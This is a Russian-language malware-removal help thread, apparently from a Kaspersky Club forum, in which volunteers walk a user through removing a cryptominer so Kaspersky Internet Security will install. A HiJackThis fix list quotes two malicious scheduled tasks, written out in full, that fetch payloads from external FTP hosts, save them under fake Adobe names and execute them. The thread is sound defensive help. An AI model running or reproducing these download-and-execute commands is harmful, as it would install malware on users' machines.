[РЕШЕНО] не запускается установщик kaspersky internet security, ранее был обнаружен майнер

[artembogdanov1985]

не запускается установщик касперский интернет секурити, ранее был обнаружен майнер и удален с помощью drweb cureit.

AVbr не устанавливается.

CollectionLog-2022.04.09-17.23.zip

[SQ]

Здравствуйте!

 

Скачайте AV block remover.

Распакуйте, запустите и следуйте инструкциям.

После перезагрузки системы соберите новый CollectionLog Автологером.

Важно: если файл AVbr.exe не запуститься, то переименуйте его, возможно майнер заблокировал это название файла.

[artembogdanov1985]

5 часов назад, SQ сказал:

Здравствуйте!

 

Скачайте AV block remover.

Распакуйте, запустите и следуйте инструкциям.

После перезагрузки системы соберите новый CollectionLog Автологером.

Важно: если файл AVbr.exe не запуститься, то переименуйте его, возможно майнер заблокировал это название файла.

да, после переименования avbr запустился, после этого уже запустился и кис.

CollectionLog-2022.04.10-00.53.zip

[SQ]

Здравствуйте,

HiJackThis (из каталога autologger)профиксить
Важно: необходимо отметить и профиксить только то, что указано ниже.

O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7A7B60AA-BA42-409F-BC97-7BCFEFAD6308} - (no key)
O22 - Task: \Microsoft\Windows\Shell\IndexerAutomaticMaintenance - {3FBA60A6-7BF5-4868-A2CA-6623B3DFFEA6} - (no file)
O22 - Task: AdobeUpdateFlac - C:\Windows\system32\cmd.exe /c echo open ftp2.ha7455h6fi1.net>>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get b.rar c:\windows\Adobeupdate.exe>>s&echo bye>>s&ftp -s:s&c:\windows\Adobeupdate.exe
O22 - Task: AdobeUpdateFlac2 - C:\Windows\system32\cmd.exe /c echo open ftp2.webpublicservices.org>>ps&echo test>>ps&echo 1433>>ps&echo get c.rar c:\windows\help\AdobeFlac.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\AdobeFlac.exe

 

 

 

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что под окном Optional Scan отмечены "List BCD" , "SigCheckExt" и "90 Days Files".

1. Нажмите кнопку Scan.
2. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
3. Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.

[artembogdanov1985]

12 часов назад, SQ сказал:

Здравствуйте!

 

Скачайте AV block remover.

Распакуйте, запустите и следуйте инструкциям.

После перезагрузки системы соберите новый CollectionLog Автологером.

Важно: если файл AVbr.exe не запуститься, то переименуйте его, возможно майнер заблокировал это название файла.

да, после переименования avbr запустился, после этого уже запустился и кис.

FRST.txt Addition.txt

[SQ]

1. Закройте и сохраните все открытые приложения.
2. Выделите следующий код::

   Start::
   CreateRestorePoint:
   HKU\S-1-5-19\...\Run: [OneDriveSetup] => C:\Windows\SysWOW64\OneDriveSetup.exe /thfirstsetup (Нет файла)
   HKU\S-1-5-20\...\Run: [OneDriveSetup] => C:\Windows\SysWOW64\OneDriveSetup.exe /thfirstsetup (Нет файла)
   Task: {9CF28ADB-B3BF-4D48-93F0-02F9859DB747} - System32\Tasks\unityplayeer => c:\users\артем\appdata\roaming\unityplayeer.exe (Нет файла) <==== ВНИМАНИЕ
   File: c:\windows\Adobeupdate.exe
   File: c:\windows\help\AdobeFlac.exe
   File: C:\Windows\SysWOW64\calc1.exe
   FirewallRules: [{EC89026D-1BED-4F5C-A965-583B95CD8311}] => (Allow) C:\Users\Артем\Desktop\AnyDesk.exe => Нет файла
   FirewallRules: [{6102F3D1-D4D3-486E-91A1-D3063437738F}] => (Allow) C:\Users\Артем\Desktop\AnyDesk.exe => Нет файла
   FirewallRules: [{229697C9-FDBA-40D7-BFCF-ACD0962CBCB2}] => (Allow) C:\Users\Артем\Desktop\AnyDesk.exe => Нет файла
   FirewallRules: [{FC6DBB86-D06B-4F31-903C-7143A90F3478}] => (Allow) C:\Users\Артем\Desktop\AnyDesk.exe => Нет файла
   FirewallRules: [{FE8F086B-34C5-4492-87A9-DA77515D33C6}] => (Allow) C:\Users\Артем\Desktop\AnyDesk.exe => Нет файла
   FirewallRules: [{B0C4ECB6-8621-4DDA-8474-4B47CC8EE21C}] => (Allow) C:\Users\Артем\Desktop\AnyDesk.exe => Нет файла
   FirewallRules: [{2395DDCA-1AB9-4B29-ABDD-8D5E69DD7D87}] => (Allow) E:\Red Dead Redemption 2\RDR2.exe => Нет файла
   FirewallRules: [{47F9C47B-68B3-4682-B7B3-7FEFA6663962}] => (Allow) E:\Red Dead Redemption 2\RDR2.exe => Нет файла
   FirewallRules: [TCP Query User{E774E56A-8489-45CA-8A23-66FB05CCE59E}E:\need for speed(tm) most wanted\nfs13.exe] => (Allow) E:\need for speed(tm) most wanted\nfs13.exe => Нет файла
   FirewallRules: [UDP Query User{AA69735A-EA24-48EF-BB63-7CA145824820}E:\need for speed(tm) most wanted\nfs13.exe] => (Allow) E:\need for speed(tm) most wanted\nfs13.exe => Нет файла
   FirewallRules: [TCP Query User{B27319A1-1B6C-493D-9629-B0D051939B67}H:\fallout.76.tricentennial.edition\games\fallout76\fallout76.exe] => (Allow) H:\fallout.76.tricentennial.edition\games\fallout76\fallout76.exe => Нет файла
   FirewallRules: [UDP Query User{0E655565-B6D6-4436-9A94-B25141B173D9}H:\fallout.76.tricentennial.edition\games\fallout76\fallout76.exe] => (Allow) H:\fallout.76.tricentennial.edition\games\fallout76\fallout76.exe => Нет файла
   FirewallRules: [TCP Query User{A8CB93BD-EB80-45D0-B9EF-FB922930B907}H:\heavy.rain.egs.rip-insaneramzes\heavyrain\heavyrain.exe] => (Allow) H:\heavy.rain.egs.rip-insaneramzes\heavyrain\heavyrain.exe => Нет файла
   FirewallRules: [UDP Query User{0DCD8F0C-F0FE-42E7-835A-D275F54DCA83}H:\heavy.rain.egs.rip-insaneramzes\heavyrain\heavyrain.exe] => (Allow) H:\heavy.rain.egs.rip-insaneramzes\heavyrain\heavyrain.exe => Нет файла
   FirewallRules: [TCP Query User{D7D0CD1C-8BF8-4E9A-B811-4DC1A98015AD}D:\games\fuser\fuser\binaries\win64\fusereos-win64-shipping.exe] => (Allow) D:\games\fuser\fuser\binaries\win64\fusereos-win64-shipping.exe => Нет файла
   FirewallRules: [UDP Query User{487B1715-C47D-4E07-957D-6AAEBBEF2E10}D:\games\fuser\fuser\binaries\win64\fusereos-win64-shipping.exe] => (Allow) D:\games\fuser\fuser\binaries\win64\fusereos-win64-shipping.exe => Нет файла
   End::

    

3. Скопируйте выделенный текст (правой кнопкой - Копировать).
4. Запустите FRST/FRST64 (от имени администратора).
5. Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt).
6. Обратите внимание, что компьютер будет возможно перезагружен.

 

Сообщите что с проблемой?

[artembogdanov1985]

спасибо большое, проблема решена. очень рад, что есть такое сообщество, где могут помочь с такими проблема как эта.

[Sandor]

11.04.2022 в 06:18, SQ сказал:

Программа создаст лог-файл (Fixlog.txt).

Прикрепите этот файл, пожалуйста.

[artembogdanov1985]

Fixlog.txt

[SQ]

Завершающие шаги:

 

Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

 

Остальные утилиты лечения и папки можно просто удалить.

 

2. Проверьте уязвимые места и устаревшее критическое ПО: Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
Прикрепите этот файл к своему следующему сообщению.

[SQ]

Мы были рады Вам помочь! Надеемся, что Вы остались довольны результатом. На нашем форуме также можно получить компьютерную помощь, помощь по продуктам "Лаборатории Касперкого", обсудить технологии и технику, заказать эксклюзивную сувенирную продукцию "Лаборатории Касперского" бесплатно! Форумчане ежегодно путешествуют. В числе приглашенных в Турцию, Армению, Сочи, Камбоджу можете стать и Вы! Будем рады видеть Вас в наших рядах! Всегда ваш, клуб "Лаборатории Касперского".